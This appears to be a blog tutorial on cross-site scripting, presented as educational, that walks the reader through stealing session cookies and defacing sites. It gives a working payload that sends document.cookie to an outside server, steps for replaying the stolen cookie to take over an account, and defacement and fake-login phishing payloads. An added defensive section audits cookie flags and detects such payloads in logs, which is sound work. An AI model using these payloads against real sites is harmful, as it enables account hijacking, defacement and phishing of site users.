Please note that this article is for educational purposes only, and is targeted at webmasters who have never seen this scenario. Please do not harm anyone.
Disclaimer: I am not responsible for any damages arising from the methods specified on this page. Webmasters, please fix it ASAP.
Cookie Stealing using XSS
Cookies are used to manage sessions in browsers. Each logged-in person gets a unique cookie; it is like a key to the site. So if you can get hold of this cookie, you have the key to enter the site: the site will welcome you as the person from whom you stole the cookie. Now let us look at how to grab the cookie using cross-site scripting.
For cookie stealing there must be an XSS hole that can be injected through the URL of the page, like the one on propmart.com we discussed in the first part.
Now, to get the cookie to your page, you would have to embed the following:
var i=new Image();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;
This code creates an image whose source URL carries the victim's cookies, so the browser sends them to your server. Embedding the script in the URL can be done as discussed in part 1.
Next, all you have to do is get this cookie (from cookiejar.txt) and set it in your browser. You can add and edit cookies in Firefox with the cookie editor plugin.
Just a refresh will certainly get you in, if you are not too late (cookies expire after some time).
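For the webmasters this article is aimed at, here is an added defender-side example (not code from the original post): it audits Set-Cookie headers for the HttpOnly, Secure and SameSite attributes that keep document.cookie from exposing a session to injected script, and it scans access-log lines for request URLs carrying the kind of payload shown above. The headers, log lines and the example.invalid host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed Set-Cookie headers: the first is how many sites still issue
# session cookies, the second is the hardened form.
SAMPLE_SET_COOKIES = [
    "PHPSESSID=abc123; Path=/",
    "session=xyz789; Path=/; Secure; HttpOnly; SameSite=Lax",
]


def audit_set_cookie(header):
    """Return the protective attributes a session cookie lacks."""
    parts = [p.strip() for p in header.split(";")]
    # parts[0] is name=value; the rest are attributes (case-insensitive)
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")  # without it, document.cookie reveals the value
    if "secure" not in attrs:
        missing.append("Secure")    # without it, the cookie travels over plain HTTP
    if "samesite" not in attrs:
        missing.append("SameSite")  # limits cross-site requests carrying the cookie
    return missing


# Constructed access-log lines: a benign search and one with a reflected
# payload (URL-encoded, as a server would log it).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2008:13:55:36] "GET /search.php?q=shoes HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2008:13:56:01] "GET /search.php?q=%3Cscript%3E'
    'i.src%3D%22http%3A%2F%2Fexample.invalid%2Fg.php%3Fc%3D%22%2Bdocument.cookie'
    '%3C%2Fscript%3E HTTP/1.1" 200 700',
]

# Decode the URL first so percent-encoding cannot hide the markers.
SUSPICIOUS = re.compile(r"<\s*script|document\.cookie", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+)')


def flag_requests(lines):
    """Return the raw request URLs whose decoded form contains a script marker."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and SUSPICIOUS.search(unquote(m.group(1))):
            hits.append(m.group(1))
    return hits
```

Run the audit against your own site's Set-Cookie headers; any session cookie that comes back with "HttpOnly" missing is exactly what the script above would capture.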
Defacing a website
To deface a website, the site must have a feature that puts something you submit onto its pages (like guestbooks or feedback forms). Now, if there is an XSS hole in such a page, you can embed the script to deface it:
<script src="(location of script)"></script>
- OR -
document.body.innerHTML="<h1>XSS Defacing</h1>your HTML code here";
You can either deface the page or craft a fake login page, which amounts to phishing.
Since it is dangerous to mention any examples, find out yourselves ...
Further reading and new XSS holes on
Let the world know ... post a comment.